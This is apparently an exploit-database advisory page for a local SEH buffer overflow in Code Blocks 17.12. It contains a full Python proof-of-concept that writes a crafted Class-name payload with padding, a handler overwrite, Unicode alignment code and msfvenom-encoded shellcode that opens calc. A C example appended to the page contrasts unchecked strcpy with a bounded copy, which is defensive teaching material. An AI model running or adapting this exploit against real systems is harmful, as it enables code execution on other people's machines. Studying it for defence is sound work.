Code Blocks 17.12 Local Buffer Overflow

2019.01.12
Credit: bzyo
Risk: High
Local: Yes
Remote: No
CVE: N/A
CWE: CWE-119

#!/usr/bin/python
#
# Exploit Author: bzyo
# Twitter: @bzyo_
# Exploit Title: Code Blocks 17.12 - Local Buffer Overflow (SEH)(Unicode)
# Date: 01-10-2019
# Vulnerable Software: Code Blocks 17.12
# Vendor Homepage: http://www.codeblocks.org/
# Version: 17.12
# Software Link: http://sourceforge.net/projects/codeblocks/files/Binaries/17.12/Windows/codeblocks-17.12-setup.exe
# Tested Windows 7 SP1 x86
#
#
# PoC
# 1. generate codeblocks.txt, copy contents to clipboard
# 2. open code blocks app
# 3. select File, New, Class
# 4. paste contents from clipboard into Class name
# 5. select Create
# 6. pop calc
#

filename = "codeblocks.txt"

# padding up to the SEH record (the field is stored as UTF-16, so each
# character below becomes two bytes in memory)
junk = "A"*1982

# next SEH pointer (Unicode-safe bytes)
nseh = "\x61\x62"

# SEH handler address
#0x005000e0 pop edi # pop ebp # ret | startnull,unicode {PAGE_EXECUTE_READ} [codeblocks.exe]
seh = "\xe0\x50"

nops = "\x47"*10

# venetian alignment: get EAX pointing at the payload
valign = (
"\x53"         #push ebx
"\x47"         #align
"\x58"         #pop eax
"\x47"         #align
"\x47"         #align
"\x05\x28\x11" #add eax
"\x47"         #align
"\x2d\x13\x11" #sub eax
"\x47"         #align
"\x50"         #push eax
"\x47"         #align
"\xc3"         #retn
)

nops_sled = "\x47"*28

#msfvenom -p windows/exec CMD=calc.exe -e x86/unicode_upper BufferRegister=EAX
#Payload size: 517 bytes
calc = (
"PPYAIAIAIAIAQATAXAZAPU3QADAZABARALAYAIAQAIAQAPA5AAAPAZ1AI1AIAIAJ11AIAIAXA58AAPAZABABQI1A"
"IQIAIQI1111AIAJQI1AYAZBABABABAB30APB944JBKLIXDBM0KPKP1PU9ZE01I0RD4KPPP0DK0RLL4KB2MD4KRRN"
"HLO6WOZNFP1KOFLOLC13LKRNLMPI18OLMM17W9RKBB21GTKPRLPDKPJOL4K0LN1RXZCPHKQZ1PQ4K29O0KQXS4KOY"
"N8YSOJOYDKNT4KKQXV01KOFLY18OLMM1GWOH9PSEKFM3SMZXOKSMNDT5ITPXDKPXMTKQ8SC6TKLL0KTKPXMLM1YCD"
"KLDTKM1J0SYOTMTMTQKQKS10YQJB1KOIPQO1OQJ4KMBZK4MQM2JKQ4MTEX2KPKPKPPP2HP1TKBOTGKOZ5GKJP6UVB"
"0V2HW65EGM5MKO8UOLLFSLLJU0KKIPRUKUWK0GMCCBRORJKPB3KOIE2CC1RLQSNNQU2X35M0AA")

fill = "D"*10000

buffer = junk + nseh + seh + nops + valign + nops_sled + calc + fill

textfile = open(filename , 'w')
textfile.write(buffer)
textfile.close()
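The PoC above is a CWE-119 fixed-buffer overwrite reached through the Class name field: the padding runs past the buffer into the SEH record, and the handler is replaced with a hard-coded address inside codeblocks.exe. The C program below is an added example written for this page, not Code::Blocks' source (which the advisory does not show). It contrasts the generic unchecked-copy pattern behind this bug class with a bounded copy that rejects names longer than an assumed 256-character limit; the limit, the function names and the test inputs are all constructed here. Compiler-level mitigations such as /SAFESEH (handler validation against a registered table) and ASLR (which breaks a fixed handler address) are separate from this input check and are not shown.

```c
#include <stdio.h>
#include <string.h>

/* Assumed limit for illustration; the real field size in Code::Blocks is
 * not stated on this page. */
#define CLASS_NAME_MAX 256

/* Unsafe pattern: strcpy has no idea how large dst is, so every byte past
 * CLASS_NAME_MAX lands on whatever follows the buffer on the stack (saved
 * registers, the return address and, on 32-bit Windows, the SEH record
 * the advisory's PoC overwrites). Shown for contrast; never called with
 * oversized input in this example. */
int copy_class_name_unchecked(char *dst, const char *src) {
    strcpy(dst, src);
    return 0;
}

/* Hardened pattern: measure the input only within the destination's
 * capacity, reject anything that does not fit (terminator included), and
 * copy exactly the measured length. For a UTF-16 field the check must be
 * done in the destination's own units (code units), not in bytes. */
int copy_class_name_checked(char *dst, size_t dst_len, const char *src) {
    const char *end = memchr(src, '\0', dst_len);
    if (end == NULL) {
        return -1;                     /* no terminator within dst_len: too long */
    }
    size_t n = (size_t)(end - src);
    memcpy(dst, src, n + 1);           /* n characters plus the terminator */
    return 0;
}

/* Returns 1 if the checked copy accepts a name of `len` characters,
 * 0 if it rejects it. A 1982-character name, the length the PoC uses
 * to reach the SEH record, is rejected. */
int accepts_name_of_length(size_t len) {
    char name[4096];                   /* constructed input, all 'A' */
    char buf[CLASS_NAME_MAX];
    if (len >= sizeof name) return 0;
    memset(name, 'A', len);
    name[len] = '\0';
    return copy_class_name_checked(buf, sizeof buf, name) == 0;
}

/* Returns 1 if a normal name survives the checked copy intact. */
int checked_copy_roundtrips(const char *src) {
    char buf[CLASS_NAME_MAX];
    if (copy_class_name_checked(buf, sizeof buf, src) != 0) return 0;
    return strcmp(buf, src) == 0;
}

int main(void) {
    printf("255 chars accepted:  %d\n", accepts_name_of_length(255));
    printf("256 chars accepted:  %d\n", accepts_name_of_length(256));
    printf("1982 chars accepted: %d\n", accepts_name_of_length(1982));
    printf("\"MyClass\" round-trips: %d\n", checked_copy_roundtrips("MyClass"));
    return 0;
}
```

The rejection happens before a single byte is written, which is the property that matters: a length check applied after an unbounded copy would run with the stack already corrupted.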


Copyright 2019, cxsecurity.com